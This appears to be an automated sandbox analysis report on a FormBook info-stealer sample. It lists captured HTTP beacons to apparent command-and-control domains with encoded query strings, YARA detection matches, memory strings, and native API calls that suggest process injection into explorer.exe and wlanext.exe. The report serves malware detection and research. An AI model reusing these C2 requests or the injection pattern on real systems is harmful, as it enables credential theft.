          Source: global trafficHTTP traffic detected: GET /aqu2/?mbyD=G7QIB1zUm5r+y6hLlZB4xuNK9AxtrOyX5//PKXARlhVXvhDVDTjLo0W6kfT9OEzqeU0h&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.appgusher.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=s0A+R2zrZH16LfLMe9M/AmUzyN8aP2GBLvlZkca4zy1idqDqw+DRrqUwOXi4yQd3lVO7 HTTP/1.1Host: www.thesixteenthround.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.biehnrecords.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 08 Apr 2021 08:49:05 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 70 6d 72 61 63 6b 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at www.pmrack.com Port 80</address></body></html>
          Source: wlanext.exe, 00000009.00000002.955588839.0000000003712000.00000004.00000001.sdmpString found in binary or memory: http://browsehappy.com/
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: wlanext.exe, 00000009.00000002.955588839.0000000003712000.00000004.00000001.sdmpString found in binary or memory: http://produkte.web.de/homepage-und-mail/homepage-parken/
          Source: explorer.exe, 00000005.00000002.955671038.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 1_2_00404EBC GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_00404EBC

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.eQLPRPErea.exe.1eb20000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.eQLPRPErea.exe.1eb20000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.eQLPRPErea.exe.1eb20000.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.eQLPRPErea.exe.1eb20000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.eQLPRPErea.exe.1eb20000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.eQLPRPErea.exe.1eb20000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.1.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.1.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_004181D0 NtCreateFile,3_2_004181D0
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00418280 NtReadFile,3_2_00418280
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00418300 NtClose,3_2_00418300
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_004183B0 NtAllocateVirtualMemory,3_2_004183B0
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_004181CA NtCreateFile,3_2_004181CA
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_0041827A NtReadFile,3_2_0041827A
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_004182FA NtClose,3_2_004182FA
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA98F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_00AA98F0
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9860 NtQuerySystemInformation,LdrInitializeThunk,3_2_00AA9860
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9840 NtDelayExecution,LdrInitializeThunk,3_2_00AA9840
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA99A0 NtCreateSection,LdrInitializeThunk,3_2_00AA99A0
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_00AA9910
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9A20 NtResumeThread,LdrInitializeThunk,3_2_00AA9A20
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_00AA9A00
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9A50 NtCreateFile,LdrInitializeThunk,3_2_00AA9A50
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA95D0 NtClose,LdrInitializeThunk,3_2_00AA95D0
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9540 NtReadFile,LdrInitializeThunk,3_2_00AA9540
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA96E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_00AA96E0
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_00AA9660
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA97A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_00AA97A0
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9780 NtMapViewOfSection,LdrInitializeThunk,3_2_00AA9780
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9FE0 NtCreateMutant,LdrInitializeThunk,3_2_00AA9FE0
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9710 NtQueryInformationToken,LdrInitializeThunk,3_2_00AA9710
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA98A0 NtWriteVirtualMemory,3_2_00AA98A0
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9820 NtEnumerateKey,3_2_00AA9820
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AAB040 NtSuspendThread,3_2_00AAB040
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA99D0 NtCreateProcessEx,3_2_00AA99D0
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9950 NtQueueApcThread,3_2_00AA9950
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9A80 NtOpenDirectoryObject,3_2_00AA9A80
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9A10 NtQuerySection,3_2_00AA9A10
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AAA3B0 NtGetContextThread,3_2_00AAA3B0
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9B00 NtSetValueKey,3_2_00AA9B00
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA95F0 NtQueryInformationFile,3_2_00AA95F0
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9520 NtWaitForSingleObject,3_2_00AA9520
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AAAD30 NtSetContextThread,3_2_00AAAD30
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9560 NtWriteFile,3_2_00AA9560
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA96D0 NtCreateKey,3_2_00AA96D0
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9610 NtEnumerateValueKey,3_2_00AA9610
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9670 NtQueryInformationProcess,3_2_00AA9670
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9650 NtQueryValueKey,3_2_00AA9650
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9730 NtQueryVirtualMemory,3_2_00AA9730
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AAA710 NtOpenProcessToken,3_2_00AAA710
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9760 NtOpenProcess,3_2_00AA9760
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA9770 NtSetInformationFile,3_2_00AA9770
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AAA770 NtOpenThread,3_2_00AAA770
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_1_004181D0 NtCreateFile,3_1_004181D0
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_1_00418280 NtReadFile,3_1_00418280
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_1_00418300 NtClose,3_1_00418300
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_1_004183B0 NtAllocateVirtualMemory,3_1_004183B0
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_1_004181CA NtCreateFile,3_1_004181CA
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_1_0041827A NtReadFile,3_1_0041827A
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_1_004182FA NtClose,3_1_004182FA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9A50 NtCreateFile,LdrInitializeThunk,9_2_030C9A50
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9910 NtAdjustPrivilegesToken,LdrInitializeThunk,9_2_030C9910
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C99A0 NtCreateSection,LdrInitializeThunk,9_2_030C99A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9840 NtDelayExecution,LdrInitializeThunk,9_2_030C9840
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9860 NtQuerySystemInformation,LdrInitializeThunk,9_2_030C9860
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9710 NtQueryInformationToken,LdrInitializeThunk,9_2_030C9710
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9780 NtMapViewOfSection,LdrInitializeThunk,9_2_030C9780
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9FE0 NtCreateMutant,LdrInitializeThunk,9_2_030C9FE0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9650 NtQueryValueKey,LdrInitializeThunk,9_2_030C9650
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9660 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_030C9660
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C96D0 NtCreateKey,LdrInitializeThunk,9_2_030C96D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C96E0 NtFreeVirtualMemory,LdrInitializeThunk,9_2_030C96E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9540 NtReadFile,LdrInitializeThunk,9_2_030C9540
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C95D0 NtClose,LdrInitializeThunk,9_2_030C95D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9B00 NtSetValueKey,9_2_030C9B00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030CA3B0 NtGetContextThread,9_2_030CA3B0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9A00 NtProtectVirtualMemory,9_2_030C9A00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9A10 NtQuerySection,9_2_030C9A10
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9A20 NtResumeThread,9_2_030C9A20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9A80 NtOpenDirectoryObject,9_2_030C9A80
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9950 NtQueueApcThread,9_2_030C9950
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C99D0 NtCreateProcessEx,9_2_030C99D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9820 NtEnumerateKey,9_2_030C9820
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030CB040 NtSuspendThread,9_2_030CB040
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C98A0 NtWriteVirtualMemory,9_2_030C98A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C98F0 NtReadVirtualMemory,9_2_030C98F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030CA710 NtOpenProcessToken,9_2_030CA710
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9730 NtQueryVirtualMemory,9_2_030C9730
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9760 NtOpenProcess,9_2_030C9760
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030CA770 NtOpenThread,9_2_030CA770
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9770 NtSetInformationFile,9_2_030C9770
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C97A0 NtUnmapViewOfSection,9_2_030C97A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9610 NtEnumerateValueKey,9_2_030C9610
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9670 NtQueryInformationProcess,9_2_030C9670
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9520 NtWaitForSingleObject,9_2_030C9520
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030CAD30 NtSetContextThread,9_2_030CAD30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C9560 NtWriteFile,9_2_030C9560
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C95F0 NtQueryInformationFile,9_2_030C95F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_008681D0 NtCreateFile,9_2_008681D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00868280 NtReadFile,9_2_00868280
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_008683B0 NtAllocateVirtualMemory,9_2_008683B0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00868300 NtClose,9_2_00868300
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_008681CA NtCreateFile,9_2_008681CA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_008682FA NtClose,9_2_008682FA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0086827A NtReadFile,9_2_0086827A
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 1_2_00403166 EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,1_2_00403166
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 1_2_004046C31_2_004046C3
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 1_2_004060D91_2_004060D9
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 1_2_004068B01_2_004068B0
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_0041B8693_2_0041B869
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_0041C07B3_2_0041C07B
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_0041C8043_2_0041C804
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_004010303_2_00401030
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_004011743_2_00401174
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_0041B9853_2_0041B985
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_0041CB983_2_0041CB98
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00408C6B3_2_00408C6B
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00408C703_2_00408C70
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00408C2B3_2_00408C2B
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_0041B4B33_2_0041B4B3
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_0041C58E3_2_0041C58E
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_0041BE993_2_0041BE99
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_0041CF433_2_0041CF43
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_0041CF0C3_2_0041CF0C
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_0041BFD43_2_0041BFD4
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_0041CFA23_2_0041CFA2
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00402FB03_2_00402FB0
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A920A03_2_00A920A0
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B320A83_2_00B320A8
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A7B0903_2_00A7B090
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B210023_2_00B21002
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A841203_2_00A84120
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A6F9003_2_00A6F900
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A9EBB03_2_00A9EBB0
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A7841F3_2_00A7841F
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A925813_2_00A92581
